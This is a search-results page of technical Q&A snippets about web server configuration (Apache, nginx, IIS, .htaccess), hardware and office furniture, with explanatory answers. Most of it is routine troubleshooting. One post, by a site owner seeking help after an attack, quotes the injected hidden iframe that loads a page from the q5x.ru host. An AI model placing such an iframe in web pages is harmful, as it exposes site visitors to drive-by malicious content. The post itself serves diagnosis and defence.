Search Results

Search found 17781 results on 712 pages for 'css height'.

Page 496/712

  • Which CPU for SQL Server machine (Xeon, i5, i7, AMD Phenom)?

    - by Tony_Henrich
    I am going to build a full-height server machine to be used for SQL Server 2008 64-bit. I have $400 to spend on a CPU. Which CPU should I get among the i5, i7, Xeon and Phenom in terms of performance? There are so many options and I am out of touch with the latest stuff. All I know is that I want something fast that works with fast DDR3 memory and some kind of fast system bus. I don't care about overclocking or 3D/graphics benchmarks; the machine will not be used for games or graphics apps. Any recommendations?

  • Mechanical mouse using USB-to-PS/2 Adapter freezes occasionally

    - by izn
    I am using an AOpen PS/2 mechanical mouse in Ubuntu 11.10 with a Staples USB-to-PS/2 adapter on my Intel DP67DE motherboard. The mouse is more comfortable for my hand because it has a lower height than optical mice. Occasionally the mouse cursor freezes, and often I have to unplug it from the USB port and plug it back in to unfreeze it. This happens with all the USB ports. I've been using the adapter for a few weeks now, and this seems to be happening more often recently. What might be happening, and is there anything that can be done to fix it?

  • Apache hanging when MaxClients is reached

    - by Ash White
    My Apache 2.2 (prefork MPM) is hanging when MaxClients is reached, rather than queueing up requests and serving them when child processes become free. When this happens, the web server is totally unresponsive until it is manually restarted. The server stack is Ubuntu 8, MySQL 5, PHP 5. Hardware is dual Xeons (2.8) with 2GB of RAM. It serves 30,000 - 50,000 pageviews per day. Static images, CSS, and JS are offloaded to a separate server and PHP is cached using eAccelerator. The HTML output of many pages is cached to the filesystem. Relevant Apache directives:

        KeepAlive On
        MaxKeepAliveRequests 50
        KeepAliveTimeout 2
        StartServers 2
        MaxClients 150
        MinSpareThreads 25
        MaxSpareThreads 75
        ThreadsPerChild 25
        MaxRequestsPerChild 2000
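
    A common cause of this exact symptom is memory exhaustion rather than request queueing: with mod_php, each prefork child can easily use tens of megabytes, so 150 busy children can push a 2GB box deep into swap, which looks like a hang. Note also that MinSpareThreads, MaxSpareThreads and ThreadsPerChild are worker-MPM directives and are ignored by prefork. A minimal prefork-only sketch, with numbers that are assumptions to be tuned against the site's measured per-child memory use:

        <IfModule mpm_prefork_module>
            StartServers          5
            MinSpareServers       5
            MaxSpareServers      10
            ServerLimit          60
            MaxClients           60     # roughly: RAM available to Apache / average per-child RSS
            MaxRequestsPerChild 2000
        </IfModule>

    With MaxClients kept within what physical memory can hold, excess connections wait in the listen backlog instead of driving the machine into swap.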

  • Apache gives empty reply

    - by Jorge Bernal
    It happens randomly, and only on Moodle installations. Apache doesn't add a line to the logs when this happens, and I don't know where to look.

        koke@escher:~/Code/eboxhq/moodle[master]$ curl -I http://training.ebox-technologies.com/login/signup.php?course=WNA001
        curl: (52) Empty reply from server
        koke@escher:~/Code/eboxhq/moodle[master]$ curl -I http://training.ebox-technologies.com/login/signup.php?course=WNA001
        HTTP/1.1 200 OK

    The Apache conf is quite straightforward and works perfectly in the other vhosts:

        <VirtualHost *:80>
            ServerAdmin [email protected]
            DocumentRoot /srv/apache/training.ebox-technologies.com/htdocs
            ServerName training.eboxhq.com

            ErrorLog /var/log/apache2/training.ebox-technologies.com-error.log
            CustomLog /var/log/apache2/training.ebox-technologies.com-access.log combined

            <FilesMatch "\.(ico|gif|jpe?g|png|js|css)$">
                ExpiresActive On
                ExpiresDefault "access plus 1 week"
                Header add Cache-Control public
            </FilesMatch>
        </VirtualHost>

    Using Apache 2.2.9, PHP 5.2.6 and Moodle 1.9.5+ (Build: 20090722). Any ideas welcome :)
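
    An empty reply with nothing written to the access or error log usually means the child process handling the request died before producing a response; with Moodle on PHP 5.2, a segfaulting PHP extension is a frequent culprit. A hedged first step (assuming the default Ubuntu/Debian log locations) is to raise the log level for this vhost and look for child-exit messages in the global error log after the next failure:

        # inside the <VirtualHost *:80> block above
        LogLevel debug

        # after reproducing the empty reply, on the shell:
        # grep -i "exit signal" /var/log/apache2/error.log

    A line such as "child pid NNNN exit signal Segmentation fault (11)" would point at a crashing module rather than a configuration problem.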

  • Nginx location issue

    - by dave
    I'm trying to set a longer (30-day) Expires header for the images (and only the images) in the /misc-stuff/ directory. This is what I'm using for my site:

        # Serve static files directly from nginx
        location ~* \.(jpg|jpeg|gif|png|bmp|ico|pdf|flv|swf|exe|html|htm|txt|css|js) {
            add_header Cache-Control public;
            add_header Cache-Control must-revalidate;
            expires 7d;
        }

    I want to be able to keep that block to handle regular site images, but create a new block to handle the /misc-stuff/ directory. I have tried:

        location ^~ /misc-stuff/ { ... }

    The problem I'm having now is that my backup .php files in that directory show up as plain text if someone tries to access them. How do I set it up so that ONLY .gif images in the /misc-stuff/ directory are affected?
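
    One way to do this (a sketch, not tested against this exact configuration) is a prefix location for the directory with nested locations that dispatch by extension, so only the .gif files get the 30-day expiry and the backup .php files stop being served as plain text:

        location ^~ /misc-stuff/ {
            # 30-day expiry only for GIF images in this directory
            location ~* \.gif$ {
                add_header Cache-Control public;
                expires 30d;
            }
            # keep backup .php files from being exposed as plain text
            location ~* \.php$ {
                return 403;
            }
        }

    The ^~ modifier keeps the server-level regex block above from capturing these requests first; if the PHP files in that directory ever need to execute instead of being blocked, the site's normal PHP handler block would have to be repeated inside this location.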

  • htaccess rewrite and auth conflict

    - by Michael
    I have two directories, each with a .htaccess file. html/.htaccess contains a rewrite that sends almost everything to url.php:

        RewriteCond %{REQUEST_URI} !(exported/?|\.(php|gif|jpe?g|png|css|js|pdf|doc|xml|ico))$
        RewriteRule (.*)$ /url.php [L]

    and html/exported/.htaccess contains:

        AuthType Basic
        AuthName "exported"
        AuthUserFile "/home/siteuser/.htpasswd"
        require valid-user

    If I remove html/exported/.htaccess, the rewriting works fine and the exported directory can be accessed. If I remove html/.htaccess, the authentication works fine. However, when both .htaccess files are present, requests for exported/ are rewritten to /url.php. Any ideas how I can prevent that?
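
    Two hedged adjustments that are commonly used for this kind of rewrite/auth conflict (sketches, assuming the usual cause, which is that the 401 challenge or its error document ends up being passed back through the parent rewrite):

        # in html/.htaccess: exclude everything under /exported/, not only URIs ending in "exported/"
        RewriteCond %{REQUEST_URI} !^/exported/
        RewriteCond %{REQUEST_URI} !\.(php|gif|jpe?g|png|css|js|pdf|doc|xml|ico)$
        RewriteRule (.*)$ /url.php [L]

        # in html/exported/.htaccess: keep Apache's built-in 401 response so the
        # authentication challenge itself is not rewritten
        ErrorDocument 401 default

    The first change anchors the exclusion at the start of the URI, so /exported/anything is left alone regardless of its extension.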

  • Why does using nginx as a reverse proxy break local links?

    - by tsvallender
    I've just set up nginx as a reverse proxy, so some sites served from the box are served directly by it and others are forwarded to a Node.js server. The site being served by Node.js, however, is displayed with no CSS or images, so I assume the links are somehow being broken, but I don't know why. The following is the only file in /etc/nginx/sites-enabled:

        server {
            listen 80;                          ## listen for ipv4
            listen [::]:80 default ipv6only=on; ## listen for ipv6

            server_name dev.my.site;
            access_log /var/log/nginx/localhost.access.log;

            location / {
                root /var/www;
                index index.html index.htm;
            }

            location /myNodeSite {
                proxy_pass http://127.0.0.1:8080/;
                proxy_redirect off;
                proxy_set_header Host $host;
            }
        }

    I had thought perhaps it was trying to find them in /var/www due to the first entry, but removing that doesn't seem to help.
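
    If the Node application writes absolute links such as /stylesheets/app.css or /images/logo.png into its pages, those requests start with / rather than /myNodeSite, so they match location / and are looked up under /var/www instead of being proxied. A sketch of one workaround, where the asset prefixes are assumptions about what the application actually emits:

        # forward the app's own asset paths to Node as well
        location ~ ^/(stylesheets|javascripts|images)/ {
            proxy_pass http://127.0.0.1:8080;
            proxy_set_header Host $host;
        }

    The cleaner long-term fixes are to give the Node site its own server_name, or to configure the application to prefix all of its links with /myNodeSite/.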

  • nginx static files caching doesn't work

    - by user74344
    Here is my conf file (usr/local/nginx/sites-available/default):

        server {
            listen 80;
            server_name localhost;

            location / {
                root  html;
                index index.php index.html index.htm;
            }

            # redirect server error pages to the static page /50x.html
            error_page 500 502 503 504 /50x.html;
            location = /50x.html {
                root html;
            }

            # serve static files directly
            location ~* ^.+.(jpg|jpeg|gif|css|png|js|ico|swf)$ {
                expires 30d;
            }
        }

    but it doesn't cache static files. How should I fix it? Thanks a lot.
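
    Two things stand out in the block above (observations based only on the config shown): the regex location has no root of its own, and root set inside location / is not inherited by sibling locations, so matching requests fall back to the build's default document root, which may or may not be the html directory intended; also, the dot before the extension list is unescaped, so the pattern matches more than file extensions. A corrected sketch under those assumptions:

        # serve static files directly
        location ~* \.(jpg|jpeg|gif|css|png|js|ico|swf)$ {
            root    html;                  # regex locations do not inherit root from "location /"
            expires 30d;
            add_header Cache-Control "public";
        }

    Moving root html; up to the server {} level (and removing it from the individual locations) is the more conventional way to keep all locations pointing at the same tree.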

  • Programmer Desk

    - by Jim
    I'm building a home office and looking for the ultimate desk. Lots of resources exist about great desk chairs, but very little about great modern desks. Requirements: $1000-$2000. Straight. No side cabinets. Attractive. Electric adjustable would be nice, but I haven't found a very attractive-looking one. The one recommended in this thread is pretty ugly: http://www.beyondtheofficedoor.com/adjustable-height-table.php The Herman Miller Sense desk looks nice: http://www.csnofficefurniture.com/asp/superbrowse.asp?clid=32&caid=&sku=HML1212&refid=PG7-HML1212 . Big fan of Herman Miller after my Aeron and Mirra. Does anyone have any experience with their desks? EDIT: Thanks all for the advice. I ended up just going with the Galant after seeing it and the Herman Millers in person. What a great desk!

  • IIS 7.5 401.3 Access Denied

    - by Jeffrey
    I am having this weird issue with IIS 7.5 on Windows 2008 R2 x64. I created a site in IIS and manually created a test file, index.html, and everything worked. When I try to do a deployment, I copy all the files from my local PC to the IIS server, try to access index.html (this is the properly deployed file) and get a 401.3 access denied error. I then manually recreate index.html, copy the content into this newly created file, and the page is accessible again... I just can't figure this out. So the issue is that IIS 7.5 can't serve files that have been copied from other PCs. I tried to reset/apply permission settings to the copied folders/files but nothing has worked. Please help. Thanks! By the way, the files that I copied are just some HTML cutups, i.e. generic HTML, CSS and image files, nothing special.
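
    Since manually recreated files work but copied ones do not, comparing the ACL of a copied file with that of a locally created one is a quick way to confirm a permissions-inheritance problem. A sketch, with C:\inetpub\mysite used as a placeholder for the real site path:

        :: show the effective ACLs of a working file and a failing file
        icacls "C:\inetpub\mysite\index.html"

        :: re-apply inherited permissions to everything under the site folder
        icacls "C:\inetpub\mysite" /reset /T /C

        :: ensure the IIS worker process and anonymous user can read the content
        icacls "C:\inetpub\mysite" /grant "IIS_IUSRS:(OI)(CI)RX" /T

    If the files were copied from a machine with different local accounts, /reset is often enough, because it discards the foreign ACL entries and lets the folder's inheritable permissions apply.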

  • Nginx .zip files return 404

    - by Kenley Tomlin
    I have set up Nginx as a reverse proxy for Node and to serve my static files and user uploaded images. Everything is working beautifully except that I can't understand why Nginx can't find my .zip files. Here is my nginx.conf:

        user nginx;
        worker_processes 1;

        error_log /var/log/nginx/error.log warn;
        pid /var/run/nginx.pid;

        events {
            worker_connections 1024;
        }

        http {
            include mime.types;
            proxy_cache_path /var/www/web_cache levels=1:2 keys_zone=ooparoopaweb_cache:8m max_size=1000m inactive=600m;
            sendfile on;

            upstream *******_node {
                server 172.27.198.66:8888 max_fails=3 fail_timeout=20s;
                #fair weight_mode=idle no_rr
            }

            upstream ******_json_node {
                server 172.27.176.57:3300 max_fails=3 fail_timeout=20s;
            }

            server {
                #REDIRECT ALL HTTP REQUESTS FOR FRONT-END SITE TO HTTPS
                listen 80;
                server_name *******.com www.******.com;
                return 301 https://$host$request_uri;
            }

            server {
                #MOBILE APPLICATION PROXY TO NODE JSON
                listen 3300 ssl;
                ssl_certificate /*****/*******/json_ssl/server.crt;
                ssl_certificate_key /*****/******/json_ssl/server.key;
                server_name json.*******.com;

                location / {
                    proxy_pass http://******_json_node;
                    proxy_redirect off;
                    proxy_set_header Host $host;
                    proxy_set_header X-Real-IP $remote_addr;
                    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
                    proxy_set_header X-Forwarded-Proto https;
                    client_max_body_size 20m;
                    client_body_buffer_size 128k;
                    proxy_connect_timeout 90s;
                    proxy_send_timeout 90s;
                    proxy_read_timeout 90s;
                    proxy_buffers 32 4k;
                }
            }

            server {
                #******.COM FRONT-END SITE PROXY TO NODE WEB SERVER
                listen 443 ssl;
                ssl_certificate /***/***/web_ssl/********.crt;
                ssl_certificate_key /****/*****/web_ssl/myserver.key;
                server_name mydomain.com www.mydomain.com;
                add_header Strict-Transport-Security max-age=500;

                location / {
                    gzip on;
                    gzip_types text/html text/css application/json application/x-javascript;
                    proxy_pass http://mydomain_node;
                    proxy_redirect off;
                    proxy_set_header Host $host;
                    proxy_set_header X-Real-IP $remote_addr;
                    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
                    proxy_set_header X-Forwarded-Proto https;
                    client_max_body_size 20m;
                    client_body_buffer_size 128k;
                    proxy_connect_timeout 90s;
                    proxy_send_timeout 90s;
                    proxy_read_timeout 90s;
                    proxy_buffers 32 4k;
                }
            }

            server {
                #ADMIN SITE PROXY TO NODE BACK-END
                listen 80;
                server_name admin.mydomain.com;

                location / {
                    proxy_pass http://mydomain_node;
                    proxy_redirect off;
                    proxy_set_header Host $host;
                    proxy_set_header X-Real-IP $remote_addr;
                    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
                    client_max_body_size 20m;
                    client_body_buffer_size 128k;
                    proxy_connect_timeout 90s;
                    proxy_send_timeout 90s;
                    proxy_read_timeout 90s;
                    proxy_buffers 32 4k;
                }
            }

            server {
                # SERVES STATIC FILES
                listen 80;
                listen 443 ssl;
                ssl_certificate /**/*****/server.crt;
                ssl_certificate_key /****/******/server.key;
                server_name static.domain.com;
                access_log static.domain.access.log;
                root /var/www/mystatic/;

                location ~*\.(jpeg|jpg|png|ico)$ {
                    gzip on;
                    gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application/rss+xml text/javascript image/svg+xml application/vnd.ms-fontobject application/x-font-ttf font/opentype image/png image/jpeg application/zip;
                    expires 10d;
                    add_header Cache-Control public;
                }

                location ~*\.zip {
                    #internal;
                    add_header Content-Type "application/zip";
                    add_header Content-Disposition "attachment; filename=gamezip.zip";
                }
            }
        }

        include tcp.conf;

    Tcp.conf contains settings that allow Nginx to proxy websockets. I don't believe anything contained within it is relevant to this question.
I also want to add that I want the zip files to be a forced download.
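
    Assuming the files really are under /var/www/mystatic/, a couple of hedged adjustments to the static server block can help narrow this down. Anchoring the regex and making the root explicit removes any ambiguity about which tree is searched; also note that mime.types already maps .zip to application/zip, so the add_header Content-Type line is redundant at best (add_header appends a second header rather than replacing the derived one):

        location ~* \.zip$ {
            root /var/www/mystatic/;      # explicit, so it is obvious where nginx looks
            # mime.types already sets Content-Type: application/zip for .zip files
            add_header Content-Disposition "attachment; filename=gamezip.zip";
        }

    If the 404 persists, the error log will contain an "open() ... failed (2: No such file or directory)" line showing the exact path nginx tried, which also confirms whether the request is reaching this server block at all rather than one of the proxied ones.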

  • Website attacked with a hidden iframe (q5x.ru)

    - by Dreas Grech
    A website of mine has recently been infected with some sort of attack that involved injecting a hidden iframe whose source was the site q5x.ru (do not link). A Google search didn't help me figure out how this attack may have taken place, so I was wondering if any of you have encountered this same problem? The iframe code was something of the sort:

        <iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe>

    As per request, I am running an ASP.NET website with a database, and as regards forms, it's obviously the ASP.NET form that's used for postbacks.

  • How to Enable Multirow Bookmarks Toolbar?

    - by IneedHelp
    I have tried using Multirow Bookmarks Toolbar Plus and Roomy Bookmarks Toolbar Firefox add-ons, but the problem is that they are constantly stressing my CPU (even when idling). It probably has something to do with version 11 of the browser. Anyway, is there some clean way to increase the height of the bookmarks toolbar and allow it to display bookmarks on multiple rows? I've read a lot of articles that refer to userChrome.css and I have tried a dozen solutions, but none worked because they were outdated. Please help me with this.

  • droid cam makefile understanding and error

    - by nerorevenge
    I tried installing DroidCam on my Fedora 19 (64-bit) machine. The link to the DroidCam application is here, and whenever I try to install it, the following Makefile is invoked:

        obj-m := v4l2loopback-dc.o

        all:
        	make -C /lib/modules/`uname -r`/build M=`pwd`

        test:
        	gcc test.c -o test

        clean:
        	make -C /lib/modules/`uname -r`/build M=`pwd` clean

        insmod:
        	sudo insmod v4l2loopback-dc.ko width=320 height=240

        rmmod:
        	sudo rmmod v4l2loopback-dc.ko

    and here is the error:

        -- INSTALL: Webcam parameters: '320' and '240'
        -- INSTALL: Building v4l2loopback-dc.ko
        make -C /lib/modules/`uname -r`/build M=`pwd`
        make: *** /lib/modules/3.9.5-301.fc19.x86_64/build: No such file or directory. Stop.
        make: *** [all] Error 2
        -- INSTALL: v4l2loopback-dc.ko not built.. Failure

    build happens to be a symbolic link. I was wondering what exactly the Makefile is trying to do and why it is failing?
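
    The all target is the standard out-of-tree kernel module build: make -C /lib/modules/$(uname -r)/build M=$(pwd) re-enters the build system of the currently running kernel and compiles v4l2loopback-dc against it. The error means /lib/modules/3.9.5-301.fc19.x86_64/build (normally a symlink into the matching kernel headers) points at nothing, i.e. the development headers for the running kernel are not installed. A hedged fix for Fedora 19, with the package name taken from the standard Fedora layout:

        # install the development headers that match the running kernel
        sudo yum install kernel-devel-$(uname -r)

        # then re-run the DroidCam install script / make
        make

    If yum cannot find that exact version, running sudo yum update kernel and rebooting so that uname -r matches an available kernel-devel package is the usual alternative.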

  • Creating a cookieless application on a development machine with ASP.NET

    - by zaladane
    I am thinking about setting up a new domain to host static content on my website and have it cookieless, just like Stack Overflow does with its static domain. Before going ahead and buying the domain and setting it up, I wanted to test it on my development machine first under localhost (I should mention that I am planning on having IIS serve the static files on the new domain). I therefore created a new application under IIS and disabled session state and forms authentication. When my main application needs resources like CSS, images and JS, I use the path to the "static" application where they are hosted. The problem is that when I look at the request and the response for the requested files, they still have the session_id cookie set as well as the ASP.NET authentication cookie. Is it at all possible to accomplish what I am trying to do on a development machine, or do I have to just go ahead and purchase the new domain, which hopefully will make things right? I tried to read about cookieless domains but can't figure out what I might be missing.
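
    One thing worth noting: cookies are scoped to the host name, so two IIS applications under the same localhost host will share every cookie no matter how the static application is configured; testing truly cookieless behaviour locally generally needs a second host name (for example, an extra entry in the hosts file) rather than a second application. Making sure the static application itself never issues cookies can be sketched in its web.config using standard ASP.NET settings (an illustration, not a verified config):

        <configuration>
          <system.web>
            <sessionState mode="Off" />
            <authentication mode="None" />
            <roleManager enabled="false" />
          </system.web>
        </configuration>

    Even with this in place, cookies set by the main application are still sent by the browser to every path on the same host, which is why the separate host name (and eventually the separate domain) is what actually makes those requests cookieless.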

  • How can you add two lines of text on a single line in Word 2010?

    - by deodorant
    Odd title; I wasn't sure how to word it. Basically, I have two separate fonts I want on the same line, for resume purposes. My name is in a large font at the top, and I want my email and website address right-aligned directly beside it, one on top of the other. However, I want the email and website together to be the same height as my name. Is this even possible with Word? Surely it is. Here is an awesome graphic of what I'm hoping for. Thanks! Edit: It seems new users can't post images. The link is here: http://i.stack.imgur.com/0gc3s.png

  • IIS 7.5 doesn't load static html pages

    - by Kizz
    There is an IIS 7.5 freshly installed on a dedicated server. An ASP.NET 4.0 web app was copied to its folder, a new website was created on its own IP on port 80, the IIS_IUSR and IUSR accounts have read/execute rights on the site's folder, and the site is assigned to its own integrated app pool running .NET 4.0 (I tried a Classic pool with the same results). The problem: when I try to access this web site, the browser only loads content generated by .NET resources such as aspx pages, .axd files, etc. Static images and static JS, CSS and HTML files are in the page source but IIS doesn't serve them. Dev tools in all browsers complain that all those static resources have been sent by the server with the wrong content type (plain text instead of images, stylesheets, etc.). What am I doing wrong?
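
    In IIS 7.5 the content type of static files comes from the staticContent/mimeMap configuration, and a web.config copied along with the application can override it, so the deployed web.config is worth checking for anything under <staticContent> (or a wildcard handler) that was not in the hand-built test site. As an illustration of the standard schema (values assumed), an explicit per-extension mapping looks like this:

        <configuration>
          <system.webServer>
            <staticContent>
              <remove fileExtension=".css" />
              <mimeMap fileExtension=".css" mimeType="text/css" />
            </staticContent>
          </system.webServer>
        </configuration>

    The <remove> element is needed because adding a mapping that already exists at the server level produces a duplicate-collection-entry error.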

  • Screenshot shows black area with dual monitors on Ubuntu

    - by Hollister
    When using the built-in window screenshot function on Ubuntu (Alt-PrintScreen) with dual monitors, a black rectangle covers about the top third of the captured window (or that area is not captured). When capturing the entire screen (PrintScreen), the left monitor shows the same size rectangle, but it doesn't cover the window; it pushes it down. It's as if the capture is using the smaller monitor's dimensions and is not aware of the larger monitor. Here are the images: window capture: http://moby.to/8d69hp and screen capture: http://moby.to/v99gqs. When using the command line, I get this error:

        $ gnome-screenshot --window
        (gnome-screenshot:8522): GdkPixbuf-CRITICAL **: gdk_pixbuf_composite: assertion `dest_y >= 0 && dest_y + dest_height <= dest->height' failed

    System info: Ubuntu 10.04.2 LTS (Lucid), Linux 2.6.32-32-generic, left monitor (laptop) 1280x800, right monitor (external) 1920x1080. Is there a way to get this to work? Edit: this does not happen with one monitor or when the monitors are mirrored.

  • Are animated GIFs supported in Google Chrome?

    - by James Goodwin
    I have recently been testing a website and found animated GIF images that seem to display fine in IE and Firefox, but in Google Chrome they only show briefly and then disappear! This happens whether I view the image on the page or view the file directly. Are there any reported problems displaying GIFs in Chrome, or is it just being fussy? There seem to have been some problems in older versions of Chrome, but it's hard to believe something as simple as this wouldn't have been fixed by now. The version of Google Chrome I am using is 4.1.249.1021. Not sure if this is relevant, but some info about the image: width 216 pixels, height 36 pixels, horizontal resolution 96 dpi, vertical resolution 96 dpi, bit depth 32, frame count 3. EDIT: Seems to be a problem relating to the latest beta version of Chrome, as it works fine in 4.0.249.

  • Is it me or is developing web based data entry GUIs a big pain?

    - by GregH
    Maybe it's me or maybe it isn't. I don't have a huge amount of experience developing web-based data entry software, but I do have some; I used to do it quite a bit years ago. I used Oracle Forms, Visual Studio, and various fourth-generation languages, and laying out the user interface used to be a snap. Now building the user interface for a web application seems to be a huge pain in the rear. Just trying to get text entry fields and widgets to go where they are supposed to go on the screen is a total pain. You have to know JavaScript, CSS, jQuery, HTML, etc. There must be an easier way to develop data entry forms that produces the needed underlying code for a web page. Maybe I'm just not looking in the right place. There must be some WYSIWYG GUI development tools for the web for building data entry forms out there. Anybody know of any?

  • Linux Programs for pulling measurements from graphics

    - by Zack
    As a front-end developer, I'm often given graphics of web sites and told, pretty much, "Make it work." I've recently started working on Linux 100% of the time and was wondering if there are any programs out there that are good for "digesting" graphics. All I do, pretty much, is draw little selection boxes and take notes on their dimensions; I also slice out pieces of the graphic (i.e. copy out just the part of the graphic I need to recreate the same effect in CSS). Before now I've been very happy with Fireworks, but I need something for Linux. Any suggestions? As a note, I mainly deal with pixel-based graphics, so the program being vector-based isn't a necessity.

  • How many users are "many users"?

    - by kemp
    I need to find a solution for a website which is struggling under load. The site gets ~500 simultaneous connections during peak time and counts around 42k hits per day. It's a WordPress-based site bridged with a vBulletin forum, with a lot of content and a fairly complex structure that makes intensive use of the database. I have already implemented code-level full-page caching (without this the server just crashes), configured all the other caching directives, and combined CSS files and the like to limit HTTP requests as much as possible. I need to understand whether there is more that can be done via software, or whether the load is just too much for the server to handle and it needs to be upgraded, because the server goes down occasionally during peak times. I can't access the server right now, but it's a dedicated CentOS machine (I think 4GB RAM; can't say what CPU) running Apache/MySQL. So back to the main question: how can I know when the users are just too many?

  • Sharepoint Services 3.0: 403 Forbidden fun

    - by gravyface
    I can't get to the Administration site or the "companyweb" site itself; both were working up to a week ago. Old threads, blog posts, etc. indicate that there was an issue with a KB update that was resolved when .NET Framework 2.0 SP1 was deployed/installed. Running Process Monitor, I can see a lot of 'PATH NOT FOUND' and 'NAME NOT FOUND' results for c:\inetpub\companyweb\Default.aspx, \_themes\ice\...\foo.css, etc. from the w3wp.exe process on CreateFile or QueryOpen operations. These files do not exist in the location specified. I don't recall these files actually existing in that folder, but I believe they're "created" when requested, pulled in from Common Files/Shared or whatever, in typically-awesome Microsoft web architecture land (</rant>). Besides reinstalling (which I'm sure will be as much fun as migrating from one server to another was), does anyone know what's going on? Google-fu has eluded me.

  • 5v PCI to PCI-X or PCIe adapter?

    - by SiegeX
    We unfortunately have a very expensive ($10K) full-length 5-volt PCI card that we would like to use in the same system as another expensive PCI-X card. As luck would have it, it seems that PCI-X is not backwards compatible with 5V PCI cards. It would be a real shame to have to order a whole new server just to accommodate these two cards together. Does there exist any internal converter/adapter that will allow one to place a full-length 5V PCI card into either a PCI-X or PCIe slot? I've found an external expansion box that suits our needs, but it's 1) external and 2) $1100. The only internal adapters I've been able to find go from low-profile PCI to PCIe; nothing seems to support full-height, full-length PCI cards.

  • New LAMP server, all links redirecting to localhost

    - by serilain
    I've got a very frustrating issue with what should be a bespoke install of Ubuntu 12.04, the LAMP config provided in apt-get install lamp-server^, and a web application called The Fascinator. After installing those three things and making no changes to any of them, I can access the application through a public IP (http://lib-hf1.lib.sfu.ca:9997 for the curious), but the domain of every link within that page is changed to localhost, including links to images and CSS, so nothing loads correctly and all of the links are broken. I've Googled around and found some people who appear to be having this issue with WP and Drupal, but nothing makes reference to a system-wide setting, and no one using the Fascinator seems to be having this issue. I have a faint memory that this might have something to do with mod_rewrite, but I'm pretty well stumped.
